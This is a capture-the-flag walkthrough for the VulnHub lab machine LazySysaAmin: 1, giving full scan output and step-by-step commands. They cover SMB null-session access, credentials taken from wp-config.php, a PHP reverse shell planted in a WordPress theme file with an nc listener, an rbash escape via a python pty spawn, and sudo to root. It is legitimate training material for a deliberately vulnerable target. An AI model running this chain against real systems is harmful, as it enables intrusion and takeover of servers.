LazySysaAmin: 1 – Walkthrough

Machine Information

  • Name: LazySysaAmin: 1
  • Date release: 20 Sep 2017
  • Author: Togie Mcdogie (Twitter: @TogieMcdogie)
  • Difficulty: Beginner – Intermediate
  • Description: Boot2root created out of frustration from failing my first OSCP exam attempt.
  • Download: https://www.vulnhub.com/entry/lazysysaamin-1,205/

Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

I got the results 192.168.226.132 then ran a nmap scan.

nmap -vv – Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -oA detailed_scan -n 192.168.226.132

# Nmap 7.25BETA2 scan initiated Wed Oct 4 09:53:30 2017 as: nmap -vv - Pn -sS -A -sC -p- -T 3
 -script-args=unsafe=1 -oA detailed_scan -n 192.168.226.132
 Nmap scan report for 192.168.226.132
 Host is up, received arp-response (0.00090s latency).
 Scanned at 2017-10-04 09:53:32 EDT for 28s
 Not shown: 65529 closed ports
 Reason: 65529 resets
 PORT STATE SERVICE REASON VERSION
 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;
 protocol 2.0)
 | ssh-hostkey:
 | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
 | ssh-dss AAAAB3NzaC1kc3MAAACBAKXQVTTRKsDhYwPWdmZ2BDTjKcCtJ7SnW0BHwbBvIdUVOh7zjZ6xjkEJ4TkT/Y
 +lJUolKMMNDu
 +CNPrRNKyBfjQ5w13mO7/3mKh9p52bzHG6XFS2m7GI4cLiDbmjO9L/YhU5deFP1Bo02KxzREp/ipz/CVlRr8IZm/x7SbPXt
 zv1AAAAFQDorLYH3AOwt18+kzAxGO0f2SarWQAAAIEAmOm6aWDLi
 +a85rfIm2Llb24aPZN3OsntJKVk4iCDbKxXi7xd6K9h1t+Utrg7dn4oO/QrVv8RRYBSiuJ8sy7B2+YDM0X7v
 +yqIG8FdA66tFpnMiMvdhYXoLyiod71vTqmGuAVKyHc56fUtdb3gCMjO0CHhPTKg2S0gPfFOqiyGVUAAACACvwr3X/J810m
 evpUQokt4xBBPNiIGkbK9KbZG63vi1NvGmaOkzbo3Cf8gZ0ILFd3YlryhP6c8PHaQMWcvzMT9oTyJ4FOokv1D3Mh4APPZ1S
 DqCmryHmRazggnbYlbGkYiqmZHUvS1zNalJHfC/QIHQZAjeUrHl8ZVHKk5ZYktAE=
 | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL4kUdp6Gej0kmVuGrpPSUUIqYmMsiqjbZ4PFCmji
 +ozLhgBlWE4+XcghV9PWTUmBdU6yZsylputJMi87GBW8s66tCnZU2lm+APerAT+euYlUgi+xoigD
 +g2VWthVNwvj2mg8updYtcZ3Jv2besdsohtadike0fwJAPfvl/ss9jE9AFv73DHu2EuwrP/3tM0WG7GgQQj01TFmrLYnDX9
 unvKcOi3kLgQ9I6JfdSC1oc+lBtkOp12hr5gIlYIlAgI
 +E2yl79cdk6PTQ4mgRmIEJguLbWo8mnaEI77y1Lz7xpxi89/gWjQuS+DMPbbpoJZdRkTldTr0QaJuP2i0ys8Dh
 | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
 |_ecdsa-sha2-nistp256
 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBcmYC//tB7vdI00Q3Czjvzi7cao1q
 +PtbUHYxSk7ay3rM1LStjxRkpUZPQWpVRdU9kWJhIiYZDMPf8gOSgC2eY=
 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
 |_http-generator: Silex v2.2.7
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 | http-robots.txt: 4 disallowed entries
 |_/old/ /test/ /TR2/ /Backnode_files/
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: Backnode
 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
 6667/tcp open irc syn-ack ttl 64 InspIRCd
 | irc-info:
 | server: Admin.local
 | users: 1.0
 | servers: 1
 | chans: 0
 | lusers: 1
 | lservers: 0
 | source ident: nmap
 | source host: 192.168.226.131
 |_ error: Closing link: (nmap@192.168.226.131) [Client exited]
 MAC Address: 00:0C:29:46:BB:56 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.4
 TCP/IP fingerprint:
 OS:SCAN(V=7.25BETA2%E=4%D=10/4%OT=22%CT=1%CU=35973%PV=Y%DS=1%DC=D%G=Y%M=000
 OS:C29%TM=59D4E7F8%P=i686-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=I%I
 OS:I=I%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW
 OS:6%O5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120
 OS:%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
 OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
 OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
 OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
 OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
 OS:FI=N%T=40%CD=S)

Uptime guess: 0.004 days (since Wed Oct 4 09:48:19 2017)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=263 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
 | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | Names:
 | LAZYSYSADMIN<00> Flags: <unique><active>
 | LAZYSYSADMIN<03> Flags: <unique><active>
 | LAZYSYSADMIN<20> Flags: <unique><active>
 | WORKGROUP<00> Flags: <group><active>
 | WORKGROUP<1e> Flags: <group><active>
 | Statistics:
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | p2p-conficker:
 | Checking for Conficker.C or higher...
 | Check 1 (port 34402/tcp): CLEAN (Couldn't connect)
 | Check 2 (port 8449/tcp): CLEAN (Couldn't connect)
 | Check 3 (port 51322/udp): CLEAN (Failed to receive data)
 | Check 4 (port 50819/udp): CLEAN (Failed to receive data)
 |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: lazysysadmin
 | NetBIOS computer name: LAZYSYSADMIN
 | Domain name:
 | FQDN: lazysysadmin
 |_ System time: 2017-10-04T23:53:48+10:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 |_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
 HOP RTT ADDRESS
 1 0.90 ms 192.168.226.132

Post-scan script results:
 | clock-skew:
 |_ -3s: Majority of systems scanned
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at
 https://nmap.org/submit/ .
 # Nmap done at Wed Oct 4 09:54:00 2017 -- 1 IP address (1 host up) scanned in 31.20 seconds

I found Port 80 and Port 139,445 so I ran Nikto and Enum4linux

nikto -h 192.168.226.132 -p 80

 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP: 192.168.226.132
 + Target Hostname: 192.168.226.132
 + Target Port: 80
 + Start Time: 2017-10-04 09:55:18 (GMT-4)
 ---------------------------------------------------------------------------
 + Server: Apache/2.4.7 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect
 against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the
 content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + OSVDB-3268: /old/: Directory indexing found.
 + Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /test/: Directory indexing found.
 + Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /Backnode_files/: Directory indexing found.
 + Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + "robots.txt" contains 4 entries which should be manually viewed.
 + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final
 release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 + OSVDB-3268: /apache/: Directory indexing found.
 + OSVDB-3092: /apache/: This might be interesting...
 + OSVDB-3092: /old/: This might be interesting...
 + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
 + Uncommon header 'x-ob_mode' found, with contents: 0
 + OSVDB-3092: /test/: This might be interesting...
 + /info.php: Output from the phpinfo() function was found.
 + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found.
 This gives a lot of system information.
 + OSVDB-3233: /icons/README: Apache default file found.
 + /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
 + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list
 (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
 + Uncommon header 'link' found, with contents: <http://192.168.226.132/wordpress/index.php?
 rest_route=/>; rel="https://api.w.org/"
 + /wordpress/: A WordPress installation was found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 7690 requests: 0 error(s) and 27 item(s) reported on remote host
 + End Time: 2017-10-04 09:56:06 (GMT-4) (48 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested

enum4linux -a 192.168.226.132

 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct
 4 10:57:17 2017

==========================
 | Target Information |
 ==========================
 Target ........... 192.168.226.132
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 =======================================================
 | Enumerating Workgroup/Domain on 192.168.226.132 |
 =======================================================
 [+] Got domain/workgroup name: WORKGROUP

===============================================
 | Nbtstat Information for 192.168.226.132 |
 ===============================================
 Looking up status of 192.168.226.132
 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
 LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
 LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

========================================
 | Session Check on 192.168.226.132 |
 ========================================
 [+] Server 192.168.226.132 allows sessions using username '', password ''

==============================================
 | Getting domain SID for 192.168.226.132 |
 ==============================================
 Domain Name: WORKGROUP
 Domain Sid: (NULL SID)
 [+] Can't determine if host is part of domain or part of a workgroup

=========================================
 | OS information on 192.168.226.132 |
 =========================================
 [+] Got OS info for 192.168.226.132 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1]
 Server=[Samba 4.3.11-Ubuntu]
 [+] Got OS info for 192.168.226.132 from srvinfo:
 LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
 platform_id : 500
 os version : 6.1
 server type : 0x809a03

================================
 | Users on 192.168.226.132 |
 ================================
 Use of uninitialized value $users in print at ./enum4linux.pl line 874.
 Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
 Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

============================================
 | Share Enumeration on 192.168.226.132 |
 ============================================
 WARNING: The "syslog" option is deprecated
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 share$ Disk Sumshare
 IPC$ IPC IPC Service (Web server)

Server Comment
 --------- -------
 LAZYSYSADMIN Web server

Workgroup Master
 --------- -------
 WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.226.132
 //192.168.226.132/print$ Mapping: DENIED, Listing: N/A
 //192.168.226.132/share$ Mapping: OK, Listing: OK
 //192.168.226.132/IPC$ Mapping: OK Listing: DENIED

=======================================================
 | Password Policy Information for 192.168.226.132 |
 =======================================================

[+] Attaching to 192.168.226.132 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
 [+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
 [+] Password history length: None
 [+] Maximum password age: Not Set
 [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
 [+] Domain Password Store Cleartext: 0
 [+] Domain Password Lockout Admins: 0
 [+] Domain Password No Clear Change: 0
 [+] Domain Password No Anon Change: 0
 [+] Domain Password Complex: 0

[+] Minimum password age: None
 [+] Reset Account Lockout Counter: 30 minutes
 [+] Locked Account Duration: 30 minutes
 [+] Account Lockout Threshold: None
 [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
 Minimum Password Length: 5
 =================================
 | Groups on 192.168.226.132 |
 =================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

==========================================================================
 | Users on 192.168.226.132 via RID cycling (RIDS: 500-550,1000-1050) |
 ==========================================================================
 [I] Found new SID: S-1-22-1
 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
 [I] Found new SID: S-1-5-32
 [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username
 '', password ''
 S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
 S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
-snip-
 S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
-snip-
 [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
-snip-
 S-1-5-32-544 BUILTIN\Administrators (Local Group)
 S-1-5-32-545 BUILTIN\Users (Local Group)
 S-1-5-32-546 BUILTIN\Guests (Local Group)
 S-1-5-32-547 BUILTIN\Power Users (Local Group)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
 S-1-5-32-549 BUILTIN\Server Operators (Local Group)
 S-1-5-32-550 BUILTIN\Print Operators (Local Group)
-snip-
 [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\togie (Local User)

================================================
 | Getting printer info for 192.168.226.132 |
 ================================================
 No printers returned.
 enum4linux complete on Wed Oct 4 10:58:40 2017

From the result of Nikto I found a wordpress directory /wordpress/ and phpMyAdmin /phpmyadmin/ directory.

Using enum4linux I found a share folder that allows listing and allows null session.

 //192.168.226.132/share$ Mapping: OK, Listing: OK

Exploitation

Using the information I gathered I was able to exploit the vulnerable machine.

I used smbclient to connect and check the contents of the shared folder.

smbclient //192.168.226.132/share$

Under /wordpress I found wp-config.php. (wp-config.php is a config file of wordpress it contains database name, username and password to the database)

I navigated to phpMyAdmin and used the credentials I found from wp-config.php.

Clicking on the table wp_users I encountered an error.

I used the manual query to bypass the error.

SELECT `user_login` , `user_pass` , `user_nicename` , `user_email`
 FROM wp_users

I found the username and hashed password. I ran John to crack the hashed password.

While John cracking the password I tried to log in the credentials  “Admin” as username and “TogieMYSQL12345^^” as password.

Using the credential Admin:TogieMYSQL12345^^ I was able to login to WordPress.

I navigated to Apperance>Editor to edit 404.php of twentyfifteen theme.

I copied the content of /usr/share/webshells/php/php-reverse-shell.php then edit it to set the correct IP and port.

I setup a listener using nc.

nc -nlvp 443

I ran the reverse shell by browsing into http://192.168.226.132/wordpress/wp-content/themes/twentyfifteen/404.php

I got low privilege shell!

I checked /etc/passwd

cat /etc/passwd

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 libuuid:x:100:101::/var/lib/libuuid:
 syslog:x:101:104::/home/syslog:/bin/false
 messagebus:x:102:106::/var/run/dbus:/bin/false
 landscape:x:103:109::/var/lib/landscape:/bin/false
 togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

Using username togie I tried to log in to SSH using the password I found in deets.txt. 

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

ssh togie@192.168.226.132
Using 12345 as password and I was able to log in.

I found out that I was in restricted shell after running few commands dir and cd.

Using this command I was able to bypass the restricted shell.

python -c ‘import pty; pty.spawn(“/bin/sh”)’

I ran id and found out that togie is under sudo group.

I entered sudo su then used 12345 as password and got root.

I navigated to /root to get the proof.txt

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
 Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie
 Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.